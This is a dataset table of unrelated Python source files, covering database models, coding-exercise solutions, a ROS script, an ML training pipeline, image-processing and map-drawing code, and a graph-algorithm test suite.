text stringlengths 38 1.54M |
|---|
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy.orm import relationship, backref
from petshop.database import Base
from petshop.cliente.Cliente import Cliente
from typing import Dict
class Endereco(Base):
__tablename__ = "enderecos"
id_cliente = Column(Integer, ForeignKey(Cliente.id_cliente),primary_key=True, autoincrement=True)
rua = Column(String(100))
numero = Column(String(20))
estado = Column(String(30))
cep = Column('CEP', String(20))
cidade = Column(String(100))
bairro = Column(String(100))
def __repr__(self):
return f"<{self.id_cliente} {self.cidade}>"
def anonimizar(self) -> None:
self.rua = None
self.numero = None
self.cep = None
self.bairro = None
def to_dict(self, completo=True)-> Dict[str, str]:
return {
"cidade": self.cidade,
"rua": self.rua,
"numero": self.numero,
"cep": self.cep,
"bairro": self.bairro
}
|
# # 9498. 시험성적
# score = int(input())
# A = { 10:"A", 9:"A", 8:"B", 7:"C", 6:"D" }
# if score//10 in A.keys() :
# print(A[(score//10)])
# else:
# print("F")
# # 10817. 세 수
# L = list(map(int,input().split()))
# L.sort()
# print(L[1])
# # 10871. X보다 작은 수
# import sys
# N, X = map(int,sys.stdin.readline().split())
# A = list(map(int,sys.stdin.readline().split()))
# for i in range(N):
# if A[i] < X:
# print(A[i])
# # 1546. 평균
# import sys
# N = int(sys.stdin.readline())
# M = list(map(int, sys.stdin.readline().split()))
# T = 0
# M.sort()
# B = M[N-1]
# for i in range(N):
# M[i] = M[i] / B*100
# T += M[i]
# print(T/N)
# # 4344. 평균은 넘겠지
# import sys
# C = int(sys.stdin.readline())
# F = list(range(C))
# T = 0
# ct = 0
# for i in F:
# ct = 0
# T = 0
# F[i] = list(map(int,sys.stdin.readline().split()))
# for j in range(1, F[i][0]+1):
# T += F[i][j]
# Avg = T/F[i][0]
# for j in range(1, F[i][0]+1):
# if F[i][j] > Avg:
# ct += 1
# F[i] = format(ct/F[i][0]*100, '.3f')
# for i in range(C):
# print(F[i], end ='% \n')
# # 1110. 더하기 사이클
# C = input()
# N = C
# A = 0
# ct = 0
# while True:
# if int(N) < 10:
# N = str(int(N)) + str(int(N))
# ct += 1
# else:
# ct += 1
# A = int(N[0]) + int(N[1])
# if len(str(A)) == 2:
# N = str(N[1]) + str(A)[1]
# else:
# N = str(N[1]) + str(A)
# if int(C) == int(N): break
# print(ct) |
from savannah.core.interpreter import AbstractBaseCommand as Command
from savannah.core.app import App
#
# TODO: add types to the argument parsing to facilitate data processing and separate it from the logic
#
class Run(Command):
verbose_name = 'run'
help = "Run Savannah with configuration from settings.json"
def __configure__(self):
self.parser.add_argument('-sh', '--serverhost', nargs='?', type=_types_host,
help='CPUServer host. Either \'<host>\' or \'<host>:<port>\'.')
self.parser.add_argument('-sp', '--serverport', nargs='?', help='CPUServer port.', type=_types_port)
self.parser.add_argument('--uihost', nargs='?', type=_types_host,
help='User Interface host. Either \'<host>\' or \'<host>:<port>\'. '
'localui must be enabled in settings.')
self.parser.add_argument('--uiport', nargs='?', type=_types_port, help='User Interface port.')
self.parser.add_argument('-l', '--logmode', nargs='?',
help=('Indicate log mode. \'brief\' and \'detailed\' save to log files.'
'Log path must be configured in settings. '),
choices=['console', 'brief', 'detailed'])
@staticmethod
def action(serverhost: tuple = None, serverport: int = None, uihost: tuple = None, uiport: int= None, logmode=None):
app = App()
app.start() |
__author__ = 'Ofner Mario'
from mao.reporting.structure.reporting_columns import ReportingColumn
class ReportingTable():
# Key Column
# Key Name and 0based ColumnIndex
kc_name = None
kc_index = None
def __init__(self, column_list = None, key_column = None, header_rowheight = None, data_rowheight = None):
self.column_list = column_list
self.key_column = key_column
self.header_rowheight = header_rowheight
self.data_rowheight = data_rowheight
def get_key_column(self):
if self.kc_index is None:
return None
else:
return str("Name: '"+self.kc_name+"' Index: "+str(self.kc_index))
def set_key_column(self, value):
if value is None:
self._key_column = None
self.kc_name = None
self.kc_index = None
return
if isinstance(value,int):
if self.column_list is None or value > len(self.column_list):
# Todo -> Index out of Bounds Error
raise AttributeError()
self.kc_index = value
self.kc_name = self.column_list[value].header_description
elif isinstance(value,str):
if self.column_list is None or value not in self.table_header:
# Todo -> Column not found Error
raise AttributeError()
# self.kc_index = self.column_list.index(value)
self.kc_index = list(x.header_description for x in self.column_list).index(value)
self.kc_name = value
else:
raise AttributeError()
def get_column_list(self):
return self._column_list
def set_column_list(self, value):
if not all(isinstance(col_entry, ReportingColumn) for col_entry in value):
raise AttributeError
else:
self._column_list = value
def get_table_header(self):
return list(x.header_description for x in self.column_list)
def get_column_widths(self):
return list(x.column_width for x in self.column_list)
def get_header_data_format(self):
return list(x.header_data_format for x in self.column_list)
def get_column_data_format(self):
return list(x.column_data_format for x in self.column_list)
def get_header_text_format(self):
return list(x.header_text_format for x in self.column_list)
def get_column_text_format(self):
return list(x.column_text_format for x in self.column_list)
key_column = property(fget=get_key_column, fset=set_key_column)
column_list = property(fget=get_column_list, fset=set_column_list)
table_header = property(fget=get_table_header)
column_widths = property(fget=get_column_widths)
header_data_format = property(fget=get_header_data_format)
column_data_format = property(fget=get_column_data_format)
header_text_format = property(fget=get_header_text_format)
column_text_format = property(fget=get_column_text_format)
|
#!/usr/bin/env python
import sys
import rospy
import numpy as np
from tf2_msgs.msg import TFMessage
import tf
import time
import math
from numpy.linalg import inv
from artag_location.msg import AT_Message
#def callback():
# listener = tf.TransformListener()
# print listener
# if not rospy.is_shutdown():
# try:
# (trans,rot) = listener.lookupTransform('/ar_marker_2','/ar_marker_0',rospy.Time(0))
# print trans
# print rot
# except (tf.LookupException, tf.ConnectivityException):
# print('not ok')
if __name__ == '__main__':
rospy.init_node('artag_lcoation')
#t_end = time.time() + 5
#while time.time() < t_end:
#print time.time()
#callback()
#rospy.Timer(rospy.Duration(5)
callback()
listener = tf.TransformListener()
rate = rospy.Rate(10.0)
listener.waitForTransform('ar_marker_2','ar_marker_0',rospy.Time(0),rospy.Duration(4.0))
while not rospy.is_shutdown():
try:
now = rospy.Time.now()
listener.waitForTransform('ar_marker_2','ar_marker_0',rospy.Time(0),rospy.Duration(4.0))
(trans,rot) = listener.lookupTransform('ar_marker_2', 'ar_marker_0', now)
print trans
# except:
# continue
rospy.spin()
"""
#rate.sleep()
"""
|
"""Message object.
"""
import json
import logging
from typing import Dict, List, Optional, Any
from .effects import Effect, EffectStatus, load_effect
from .utils import gen_id, short_id
from .logging import MessageLoggerAdapter
logger = logging.getLogger(__name__)
# Output pipeline effect statuses
ST_NEW = 0 # not started yet
ST_PENDING = 1 # started, wait check etc
ST_APPLIED = 2 # success
ST_FAILED = 3 # fail
class Message:
"""Message.
"""
__slots__ = ['id', 'event_type', 'content', 'meta', 'route', 'log']
id: int
event_type: str
content: Dict
meta: Optional[Dict]
route: List['Route']
log: MessageLoggerAdapter
# pylint: disable=redefined-builtin
def __init__(self, id=None, event_id=None, event_type=None, content=None,
meta=None, route=None):
if not event_type: # pragma: no cover
raise Exception("Message constructor requires event_type kwarg")
if not event_id and not id: # pragma: no cover
raise Exception(
"Message constructor requires event_id or id kwarg"
)
self.id = id or gen_id(event_id)
self.event_type = event_type
self.content = content or {}
self.meta = meta
self.route = route or []
self.log = MessageLoggerAdapter(self)
@property
def type(self):
"""Message event type.
"""
return self.event_type
def get_route_status(self, effect):
"""Get actual status of effect.
"""
for route in self.route:
if route.effect == effect:
return route.status
self.route.append(Route(effect, EffectStatus.PENDING))
return EffectStatus.PENDING
def set_route_status(self, effect, status):
"""Set effect status.
"""
for route in self.route:
if route.effect == effect:
route.status = status
break
else:
self.route.append(Route(effect, status))
def get_route_state(self, effect):
"""Get actual status of effect.
Return ST_NEW, ST_PENDING, ST_APPLIED, ST_FAILED.
"""
for route in self.route:
if route.effect == effect:
return route.state
return None
def set_route_state(self, effect, state):
"""Set route status.
"""
for route in self.route:
if route.effect == effect:
route.state = state
break
else:
self.route.append(Route(effect, EffectStatus.PENDING, state=state))
def get_route_retry(self, effect):
"""Get number of retries for effect.
"""
for route in self.route:
if route.effect == effect:
return route.retry_count
return 0
def set_route_retry(self, effect, retry_count):
"""Set number of retries for route.
"""
for route in self.route:
if route.effect == effect:
route.retry_count = retry_count
return
def to_dict(self) -> dict:
"""Serialize message to dict.
"""
return {
'id': self.id,
'event_type': self.event_type,
'content': self.content,
'meta': self.meta,
'route': [r.serialize() for r in self.route]
}
serialize = to_dict
@staticmethod
def from_dict(data: dict) -> 'Message':
"""Load message from provided dict.
"""
data['route'] = [
Route.load(r) for r in data.get('route', [])
]
return Message(**data)
load = from_dict
def pretty(self):
"""Pretty print message with route.
"""
pretty_routes = '\n'.join([
route.pretty() for route in self.route
])
lines = [
"\t",
"id: %s" % short_id(self.id, right_add=2),
"type: %s" % self.event_type,
"content: %s" % json.dumps(self.meta, indent=4),
"route:\n%s" % pretty_routes,
"meta: %s" % json.dumps(self.meta, indent=4)
]
return '\n\t'.join(lines)
def __repr__(self):
"""Instance representation.
"""
return "<Message:%s:id=%s>" % (self.event_type, self.id)
class Route:
"""Message route.
Container for effect, its overall status and state.
State may be any json-serializable object.
"""
__slots__ = ['effect', 'status', 'state', 'retry_count']
effect: Effect
status: EffectStatus
state: Any
retry_count: int
def __init__(self,
effect: Effect,
status: EffectStatus = EffectStatus.PENDING,
state=None,
retry_count=0) -> None:
self.effect = effect
self.status = status
self.state = state
self.retry_count = retry_count
def serialize(self):
"""Serialize route.
"""
return [
self.effect.serialize(),
self.status.value,
self.effect.serialize_state(self.state),
self.retry_count
]
@classmethod
def load(cls, data) -> 'Route':
"""Load serialized route to Route object.
"""
effect = load_effect(data[0])
data[0] = effect
data[1] = EffectStatus(data[1])
data[2] = effect.load_state(data[2])
return cls(*data)
def pretty(self):
"""Pretty format row.
"""
title = "\t\t{effect} <{effect_status}>".format(
effect=self.effect.__class__.__name__,
effect_status=self.status.name
)
actions = self.effect.pretty(self.state)
return '\n\t\t\t'.join([
title,
actions
])
|
def main():
n = int(input())
mydictprev = {}
mydict = {}
num = []
arr_prev = list(map(int,input().split()))
for each in arr_prev:
if(mydictprev.get(each) == None):
mydictprev[each] = 1
else:
mydictprev[each] += 1
for i in range(0,2,1):
arr = list(map(int, input().split()))
for each in arr:
if(mydict.get(each) == None):
mydict[each] = 1
else:
mydict[each] += 1
for k,v in mydictprev.items():
if( mydict.get(k) != mydictprev.get(k)):
num.append(k)
arr_prev.clear()
arr_prev = arr
mydictprev.clear()
mydictprev = mydict.copy()
mydict.clear()
print(num[0])
print(num[1])
if __name__ == '__main__':
main() |
import numpy as np
import pandas as pd
import dill
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.metrics import classification_report
import warnings
warnings.filterwarnings('ignore')
def evaluate_preds(model, X_train, X_test, y_train, y_test):
y_train_pred = model.predict(X_train)
y_test_pred = model.predict(X_test)
get_classification_report(y_train, y_train_pred, y_test, y_test_pred)
def get_classification_report(y_train_true, y_train_pred, y_test_true, y_test_pred):
print('TRAIN\n\n' + classification_report(y_train_true, y_train_pred))
print('TEST\n\n' + classification_report(y_test_true, y_test_pred))
print('CONFUSION MATRIX\n')
print(pd.crosstab(y_test_true, y_test_pred))
TRAIN_DATASET_PATH = './heart.csv'
df = pd.read_csv(TRAIN_DATASET_PATH)
TARGET_NAME = 'output'
NUM_FEATURE_NAMES = ['age','trtbps', 'chol', 'thalachh']
LOG_FEATURE_NAMES = ['oldpeak', 'caa']
CAT_FEATURE_NAMES = ['sex', 'cp', 'fbs', 'restecg', 'exng', 'slp', 'thall']
SELECTED_FEATURE_NAMES = NUM_FEATURE_NAMES + CAT_FEATURE_NAMES +LOG_FEATURE_NAMES
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
df_norm = df.copy()
df_norm[NUM_FEATURE_NAMES] = scaler.fit_transform(df_norm[NUM_FEATURE_NAMES])
df = df_norm.copy()
data_norm = df.copy()
data_norm[LOG_FEATURE_NAMES] = np.log10(data_norm[LOG_FEATURE_NAMES] + 1)
df = data_norm.copy()
UPDATED_DATASET_PATH = './new_train.csv'
df.to_csv(UPDATED_DATASET_PATH, index=False, encoding='utf-8')
TRAIN_DATASET_PATH = './new_train.csv'
df = pd.read_csv(TRAIN_DATASET_PATH)
NUM_FEATURE_NAMES = ['age','trtbps', 'chol', 'thalachh', 'oldpeak', 'caa']
CAT_FEATURE_NAMES = ['sex', 'cp', 'fbs', 'restecg', 'exng', 'slp', 'thall']
SELECTED_FEATURE_NAMES = NUM_FEATURE_NAMES + CAT_FEATURE_NAMES
X = df[SELECTED_FEATURE_NAMES]
y = df[TARGET_NAME]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, shuffle=True, random_state=21, stratify=y)
#save test
X_test.to_csv("X_test.csv", index=None)
y_test.to_csv("y_test.csv", index=None)
#save train
X_train.to_csv("X_train.csv", index=None)
y_train.to_csv("y_train.csv", index=None)
from catboost import CatBoostClassifier
model_catb = CatBoostClassifier(silent=True, random_state=21,
cat_features=CAT_FEATURE_NAMES,
# one_hot_max_size=7
)
model_catb.fit(X_train, y_train)
disbalance = y_train.value_counts()[0] / y_train.value_counts()[1]
model_catb = CatBoostClassifier(silent=True, random_state=21,
cat_features=CAT_FEATURE_NAMES,
class_weights=[1, disbalance]
)
model_catb.fit(X_train, y_train)
frozen_params = {
'class_weights':[1, disbalance],
'silent':True,
'random_state':21,
'cat_features':CAT_FEATURE_NAMES,
'eval_metric':'F1',
'early_stopping_rounds':20
}
model_catb = CatBoostClassifier(**frozen_params)
params = {'iterations':[100, 200, 500, 700, 1500],
'max_depth':[3, 5, 7]}
cv = StratifiedKFold(n_splits=3, random_state=21, shuffle=True)
grid_search = model_catb.grid_search(params, X_train, y_train, cv=cv, stratified=True, refit=True)
dpth = grid_search['params']['depth']
iterns = grid_search['params']['iterations']
final_model = CatBoostClassifier(**frozen_params, iterations=iterns, max_depth=dpth)
final_model.fit(X_train, y_train, eval_set=(X_test, y_test))
print(evaluate_preds(final_model, X_train, X_test, y_train, y_test))
with open("ml_pipeline.dill", "wb") as f:
dill.dump(final_model, f)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 14 01:59:25 2021
@author: Dominikus Edo Kristian - 20083000121
"""
jwb = "y"
while jwb=="y" or jwb=="Y":
print ("==========================")
print(" CEK NILAI HURUF")
print ("==========================")
n=0
while int(n)>=0 and int(n)<=100:
n = input("Masukkan Nilai = ")
if int(n)>=0 and int(n)<=100:
if int(n)>=91:
nilai ="A"
elif int(n)>=81:
nilai ="B"
elif int(n)>=71:
nilai ="C"
else:
nilai ="D"
print (nilai)
jwb = input("Cek Ulang? Y/T = ")
if jwb=="t" or jwb=="T":
break
else:
pesan="Masukkan nilai 0-100"
print(pesan)
break
|
from PIL import Image
import sys
# multi_im = ["sikuliximage-1506129382287.png","sikuliximage-1506129382603.png","sikuliximage-1506129382921.png","sikuliximage-1506129383237.png"]
im1 = Image.open(sys.argv[1])
#im1 = Image.open("sikuliximage-1506185019606.png")
pixelMap = im1.load()
im2 = Image.open(sys.argv[2])
#im2 = Image.open("sikuliximage-1506185019938.png")
pixelMap2 = im2.load()
img = Image.new( im1.mode, im1.size)
pixelsNew = img.load()
for i in range(img.size[0]):
for j in range(img.size[1]):
if pixelMap[i,j] == pixelMap2[i,j]:
pixelsNew[i,j] = (0,0,0)
else:
pixelsNew[i,j] = (255,255,255)
response = ""
#img.show()
img_a = Image.open("0.png")
pxl_a = img_a.load()
img_s = Image.open("1.png")
pxl_s = img_s.load()
img_w = Image.open("2.png")
pxl_w = img_w.load()
img_d = Image.open("6.png")
pxl_d = img_d.load()
pxl_list = [pxl_a, pxl_s, pxl_w, pxl_d]
arrow_list = ['a','s','w','d']
for n in range(10):
w = img.size[0]
h = img.size[1]
w2 = int(img.size[0]/10)
w3 = w2 * 1
region = (w3*n+int(w2*0.4), 0, w3*n+int(w2*0.8), h)
cropImg = img.crop(region)
pixel_crop = cropImg.load()
#cropImg.show()
#cropImg.save("%d.png"%(n),"PNG")
line_count = 0
for i in range(cropImg.size[0]):
for j in range(cropImg.size[1]):
if pixel_crop[i,j][0] == 0:
line_count = line_count + 1
if line_count < 15:
break
score = 10000
ans = ''
for k in range(4):
pixel_diff = 0
for i in range(cropImg.size[0]):
for j in range(cropImg.size[1]):
if pixel_crop[i,j][0] != pxl_list[k][i,j][0]:
pixel_diff = pixel_diff + 1
if pixel_diff < score:
score = pixel_diff
ans = arrow_list[k]
response += ans
print response
|
from PIL import Image
from mapImages import makeMapImage,getImage,getDraaiing,getColor,getShape
import os
import shutil
#
# Hier komt de code voor het genereren van die rij
#
# resize alle afbeeldingen van de map naar een 100,100 formaat
global listOfMapItems
global rijen
global kolommen
global xMax
global yMax
global pathToDraw
pathToDraw = ["[]"]
global roaming
roaming = False
def makeMap(positionList = "",path = 1):
global pathToDraw
global roaming
if os.path.exists("mapimages/kaart.txt"):
makeEmpMap()
setTargetsOnMap(positionList)
if path != 1:
roaming = '$' in path
paths = path.split("$")
pathToDraw = paths
for path in pathToDraw:
constructLine(str(path))
roaming = False
else:
shutil.copy2(r'mapimages/NOMAP.jpg',r'mapimages/map.jpg')
def makeEmpMap():
global listOfMapItems
global rijen
global kolommen
global xMax
global yMax
kaartFile = open(r"mapimages/kaart.txt", 'r')
allLines = kaartFile.readlines()
binaryLock = 1
counter = 0
while (binaryLock == 1):
if (counter == len(allLines)):
break
if (allLines[counter][0] == "#" or allLines[counter] == "\n" or allLines[counter][0] == " "):
del allLines[counter]
else:
counter += 1
kolommen = allLines[0][0]
hulpcounter = 1
while (allLines[0][hulpcounter] != " "):
kolommen += allLines[0][hulpcounter]
hulpcounter+=1
rijen = ""
listOfMapItems = []
while (len(allLines[0]) - 2 > hulpcounter):
rijen += allLines[0][hulpcounter+1]
hulpcounter += 1
for x in range(0,int(rijen)):
for y in range(0, int(kolommen)):
try:
if(allLines[x+1][2] != 'i'):
listOfMapItems.append(allLines[x+1][y*3] + allLines[x+1][y*3+1])
except:
pass
onthoudX = x + 1
beginImagesX = onthoudX + 1
listOfMapPictures = []
xMax = int(kolommen)
yMax = int(rijen)
for x in range(0,int(rijen)*int(kolommen)):
try:
if( listOfMapItems[x][0] == "0"):
picture = Image.open("mapimages/0N.jpg")
if( listOfMapItems[x][0] == "1"):
picture = Image.open("mapimages/1N.jpg")
if( listOfMapItems[x][0] == "2"):
picture = Image.open("mapimages/2N.jpg")
if( listOfMapItems[x][0] == "3"):
picture = Image.open("mapimages/3N.jpg")
if( listOfMapItems[x][0] == "4"):
picture = Image.open("mapimages/4N.jpg")
if( listOfMapItems[x][0] == "5"):
picture = Image.open("mapimages/5N.jpg")
if( listOfMapItems[x][0] == "6"):
picture = Image.open("mapimages/6N.jpg")
if( listOfMapItems[x][0] == "7"):
picture = Image.open("mapimages/7N.jpg")
if(listOfMapItems[x][1] == "N"):
picture = picture.resize((100,100))
if(listOfMapItems[x][1] == "E"):
picture = picture.resize((100,100))
picture = picture.rotate(-90)
if(listOfMapItems[x][1] == "W"):
picture = picture.resize((100,100))
picture = picture.rotate(90)
if(listOfMapItems[x][1] == "S"):
picture = picture.resize((100,100))
picture = picture.rotate(180)
listOfMapPictures.append(picture)
except:
pass
# Onthouden van de afbeeldingen
for x in range(beginImagesX, len(allLines)):
if (allLines[x][1] == "?" or allLines[x][2] == "?"):
pass
elif( allLines[x][1] != "N" and allLines[x][1] != "W" and allLines[x][1] != "S" and allLines[x][1] != "E"):
plaatsAfbeelding = allLines[x][0] + allLines[x][1]
draaiing = allLines[x][2]
y = 10
color = ""
while (allLines[x][y] != "_"):
color += allLines[x][y]
y += 1
y += 1
shape = ""
while (allLines[x][y] != "."):
shape += allLines[x][y]
y += 1
makeMapImage(plaatsAfbeelding, draaiing, color, shape)
else:
plaatsAfbeelding = allLines[x][0]
draaiing = allLines[x][1]
y = 9
color = ""
while (allLines[x][y] != "_"):
color += allLines[x][y]
y += 1
y += 1
shape = ""
while (allLines[x][y] != "."):
shape += allLines[x][y]
y += 1
makeMapImage(plaatsAfbeelding, draaiing, color, shape)
#creates a new empty image, RGB mode, and size rows*100, columns * 100.
new_im = Image.new('RGB', (int(kolommen)*100,int(rijen)*100))
#Iterate through a rows bij columns grid with 100 spacing, to place my image
for i in xrange(0,int(kolommen)*100,100):
for j in xrange(0,int(rijen)*100,100):
if (i != 0):
rescaledI = i/100
else:
rescaledI = i
if (j != 0):
rescaledJ = j/100
else:
rescaledJ = j
try:
im = listOfMapPictures[rescaledJ*int(kolommen) + rescaledI]
#Here I resize my opened image, so it is no bigger than 100,100
im.thumbnail((100,100))
new_im.paste(im, (i,j))
getImage(rescaledJ * int(kolommen) + rescaledI)
if (getImage(rescaledJ * int(kolommen) + rescaledI)):
plaats = rescaledJ * int(kolommen) + rescaledI
imageUrl = "mapimages/" + getColor(plaats) + "_" + getShape(plaats) + "." + "png"
im = Image.open(imageUrl)
im.thumbnail((40,40))
if(getDraaiing(plaats) == "W"):
new_im.paste(im, (i,j+35))
if(getDraaiing(plaats) == "N"):
new_im.paste(im, (i+35,j))
if(getDraaiing(plaats) == "E"):
new_im.paste(im, (i+60,j+35))
if(getDraaiing(plaats) == "S"):
new_im.paste(im, (i+35,j+70))
else:
new_im.paste(im, (i,j))
except:
pass
## new_im.show()
new_im.save(r'mapimages/map.jpg')
return allLines
def setTargetsOnMap(positionList):
global xMax
global yMax
gesplitsteLijst = positionList.split()
kaart = Image.open("mapImages/map.jpg", 'r')
pixelsX, pixelsY = kaart.size
widthSquare = pixelsX/xMax
heightSquare = pixelsY/yMax
i=0
while (i < len(gesplitsteLijst)):
team = gesplitsteLijst[i]
tegelMetOrientatie = gesplitsteLijst[i+1]
Orientatie = tegelMetOrientatie[-1]
tegelNr = int(tegelMetOrientatie[:-1])
x = (tegelNr%xMax) + 1
y = (tegelNr/xMax) + 1
xValue = widthSquare/2 + (x-1)*widthSquare
yValue = heightSquare/2 + (y-1)*heightSquare
target = Image.open('target-small-' + team + '.png')
if (Orientatie == 'N'):
target = target.rotate(90)
elif (Orientatie == 'W'):
target = target.rotate(180)
elif (Orientatie == 'S'):
target = target.rotate(270)
targetX, targetY = target.size
#target.convert('RGBA')
offset = (xValue-targetX/2, yValue-targetY/2)
kaart.paste(target, offset, target.convert('RGBA'))
i += 2
kaart.save("mapimages/map.jpg")
def constructLine(listOfLocationTuples):
global roaming
if (listOfLocationTuples == "[]"):
return
picture = Image.open("mapimages/map.jpg")
#(width, height) = picture.size
tijdelijk1 = listOfLocationTuples.split(', ')
tijdelijk2 = []
tijdelijk2.append(int(tijdelijk1[0][2:]))
i = 1
while (i < len(tijdelijk1)-1):
tijdelijk2.append(int(tijdelijk1[i][:-1]))
tijdelijk2.append(int(tijdelijk1[i+1][1:]))
i += 2
tijdelijk2.append(int(tijdelijk1[-1][:-2]))
print tijdelijk2
i = 0
locationTuples = []
while (i<len(tijdelijk2)):
locationTuples.append((tijdelijk2[i],tijdelijk2[i+1]))
i += 2
print locationTuples
pix = picture.load()
newListRows = []
newListColumns = []
for i,j in locationTuples:
newListRows.append(i)
newListColumns.append(j)
for x in range(0,len(newListRows)):
try:
if (newListRows[x] - newListRows[x+1] == 0):
if (newListColumns[x] < newListColumns[x+1]):
for z in range((newListColumns[x]*100) + 50, (newListColumns[x+1] * 100) + 60):
for y in range((newListRows[x]*100) + 50, (newListRows[x]*100)+60):
if roaming:
pix[z,y] = (255,0,0)
else:
pix[z,y] = (0,100,0)
else:
for z in range((newListColumns[x+1]*100) + 50, (newListColumns[x] * 100) + 60):
for y in range((newListRows[x]*100) + 50, (newListRows[x]*100)+60):
if roaming:
pix[z,y] = (255,0,0)
else:
pix[z,y] = (0,100,0)
else:
if (newListRows[x] < newListRows[x+1]):
for z in range((newListRows[x] * 100) + 50, (newListRows[x+1] * 100) + 50):
for y in range((newListColumns[x]*100)+50, (newListColumns[x]*100)+60):
if roaming:
pix[y,z] = (255,0,0)
else:
pix[y,z] = (0,100,0)
else:
for z in range((newListRows[x+1] * 100) + 50, (newListRows[x] * 100) + 50):
for y in range((newListColumns[x]*100)+50, (newListColumns[x]*100)+60):
if roaming:
pix[y,z] = (255,0,0)
else:
pix[y,z] = (0,100,0)
except:
pass
picture.load()
picture.save(r'mapimages/map.jpg')
|
import os
import sys
from subprocess import run, PIPE
class ImageParser(object):
"""
"""
def __init__(self, image_file):
if not os.path.exists(image_file):
raise AttributeError("Incorrect image file. Image file not exists.")
self.config_name = image_file
def __read__(self, section, param=None):
read_command = ["confread", self.config_name, section]
if param:
read_command.append(param)
read = run(read_command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
return_code = read.returncode
if not return_code == 0:
sys.exit(return_code)
return read.stdout
def write(self, section, param, value):
write_command = ["confwrite", self.config_name, section, param, value]
read = run(write_command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
return_code = read.returncode
if not read.returncode == 0:
sys.exit(return_code)
def get_cont_by_hostname(self, host):
out_list = self.__read__('Containers').strip().split("\n")
cont_dict = {pair.split("=")[0].strip(): pair.split("=")[1].strip()
for pair in out_list}
return cont_dict[host]
@property
def nodes(self):
out_list = self.__read__('Nodes').strip().split('\n')
node_dict = {pair.split("=")[0].strip(): pair.split("=")[1].strip()
for pair in out_list}
return node_dict
@property
def task_name(self):
return self.__read__("General", "job_id").strip()
@property
def user(self):
return self.__read__("General", "user").strip()
@property
def group(self):
return self.__read__("General", "group").strip()
@property
def docker_image_file(self):
return self.__read__("Docker", "docker_image_file").strip()
@property
def docker_image(self):
return self.__read__("Docker", "docker_image").strip()
@property
def docker_command(self):
return self.__read__("Docker", "docker_command").strip()
@property
def docker_hostsfile(self):
return self.__read__("Docker", "hostsfile").strip()
@property
def first_host(self):
first_pair = self.__read__('Nodes').split()[0]
return first_pair.split('=')[0]
if __name__ == '__main__':
a = ImageParser()
print(a.nodes)
# print(a.group)
# print(a.task_name)
# print(a.user)
# print(a.docker_image)
# print(a.docker_image_file)
# print(a.docker_command)
print(a.get_cont_by_hostname())
# read = run(["find \\\n / \\\n | \\\n grep confread"], stdout=PIPE, stderr=PIPE, universal_newlines=True)
# print(read.stdout)
# return_code = read.returncode
|
from r2.lib import amqp, websockets
from reddit_liveupdate.models import ActiveVisitorsByLiveUpdateEvent
def broadcast_update():
event_ids = ActiveVisitorsByLiveUpdateEvent._cf.get_range(
column_count=1, filter_empty=False)
for event_id, is_active in event_ids:
if is_active:
count, is_fuzzed = ActiveVisitorsByLiveUpdateEvent.get_count(
event_id, cached=False)
else:
count, is_fuzzed = 0, False
payload = {
"count": count,
"fuzzed": is_fuzzed,
}
websockets.send_broadcast(
"/live/" + event_id, type="activity", payload=payload)
# ensure that all the amqp messages we've put on the worker's queue are
# sent before we allow this script to exit.
amqp.worker.join()
|
# list = [1,2,'google']
# print(list)
#
# print(list[2])
#
# print(list[1:])
#
# list.append(40)
# print(list)
#
# list.remove('google')
# print(list)
#
# print(max(list))
# print(min(list))
# list.append(0)
# print(list)
# list.sort()
# print(list)
#
# list.sort(reverse=True)
# print(list)
list = ["India","Nepal","China"]
print(list)
list.append("Sri Lanka")
print(list)
del list[1]
print(list)
list.insert(1,'Bhutan')
print(list) |
# -*- encoding: utf-8 -*-
""" Template testing suite for Application_2 - this is the TESTING SUITE, all tests are run from here """
import poc_simpletest # imports testing engine
import _04_Application_2 as app_2 # imports the algorithms we are going to test
import alg_upa_trial as upa
import alg_module2_graphs as test_graphs # http://storage.googleapis.com/codeskulptor-alg/alg_module2_graphs.py
def run_suite(): # here we only pass a class reference, from which we are going to create an object later on
""" Some informal testing code """
print("\nSTARTING TESTS:")
suite = poc_simpletest.TestSuite() # create a TestSuite object
# 1. check the provided functions directly
suite.run_test(app_2.targeted_order({0: set([1, 2, 3]), 1: set([0, 2, 3]), 2: set([0, 1, 3]), 3: set([0, 1, 2])}), [0, 1, 2, 3], "Test #1a: 'targeted_order' method") # all nodes are of same degree so returned the nodes from 0 to 3
suite.run_test(app_2.targeted_order({0: set([3]), 1: set([2, 3]), 2: set([1, 3]), 3: set([0, 1, 2])}), [3, 1, 0, 2], "Test #1b: 'targeted_order' method") # after deleting node 3 and 1 there are only empty nodes left
# 2. check the basic functions directly
suite.run_test(app_2.random_ugraph(4, 1), {0: set([1, 2, 3]), 1: set([0, 2, 3]), 2: set([0, 1, 3]), 3: set([0, 1, 2])}, "Test #2a: 'random_digraph' method")
suite.run_test(app_2.random_ugraph(4, 0), {0: set([]), 1: set([]), 2: set([]), 3: set([])}, "Test #2b: 'random_digraph' method")
suite.run_test(app_2.compute_edges({0: set([1, 2, 3]), 1: set([0, 2, 3]), 2: set([0, 1, 3]), 3: set([0, 1, 2])}), 6, "Test #2c: 'compute_edges' method")
suite.run_test(app_2.compute_edges({0: set([1, 2, 3, 4]), 1: set([0, 2, 3, 4]), 2: set([0, 1, 3, 4]), 3: set([0, 1, 2, 4]), 4: set([0, 1, 2, 3])}), 10, "Test #2d: 'compute_edges' method")
suite.run_test(app_2.compute_edges({0: set([1, 2, 3, 4, 5]), 1: set([0, 2, 3, 4, 5]), 2: set([0, 1, 3, 4, 5]), 3: set([0, 1, 2, 4, 5]), 4: set([0, 1, 2, 3, 5]), 5: set([0, 1, 2, 3, 4])}), 15, "Test #2e: 'compute_edges' method")
# 3. Testing basic functionality of the UPA CLASS
suite.run_test(upa.UPATrial(3)._node_numbers, [0, 0, 0, 1, 1, 1, 2, 2, 2], "Test #3a: 'self._node_numbers' property")
suite.run_test(upa.UPATrial(4)._node_numbers, [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3], "Test #3b: 'self._node_numbers' property")
suite.run_test_in_range_multi(upa.UPATrial(3).run_trial(2), [0, 1, 2], "Test #3c: 'run_trial' method")
# 4. check the basic functions directly
